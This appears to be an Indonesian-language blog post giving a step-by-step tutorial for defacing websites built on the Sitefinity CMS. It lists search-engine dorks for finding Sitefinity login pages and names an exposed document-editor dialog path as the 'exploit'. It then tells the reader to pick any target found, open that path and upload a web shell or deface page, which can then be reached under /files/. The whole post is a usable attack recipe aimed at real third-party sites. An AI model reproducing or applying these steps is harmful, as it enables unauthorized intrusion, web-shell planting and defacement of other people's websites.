DEFACE TEKNIK SITEFINITY UPLOAD DOCUMENT
Deface Teknik SiteFinity Upload Document
Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
(Kembangkan Lagi Dork Tersebut , Hingga Ketemu Yang Perawan :v )
Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Oke Langsung Ketutorial ;)
1. Masukan Dork Di Search Engine.
2. Pilih Salah Satu Target Yang Ingin Di cRooTz xD
3. Masukan Exploitnya.
Contoh : localhost /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Contoh : localhost /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Vulnerability ? Muncul Tempat Upload ;)
4. Lalu Upload Shell Atau File Deface Kalian Deh.
*Kalau Upload Shell Gagal , Upload File Deface Aja , contoh.html
*Kalau Upload Shell Gagal , Upload File Deface Aja , contoh.html
5. Kalo Berhasil Nanti Akan Seperti Di Gambar Ini.
6. File Akses ? :o
loclahost /files/Nama.File.ext
Selesai ;)
Posting Komentar
Harap berkomentar dengan sopan, dan jelas :)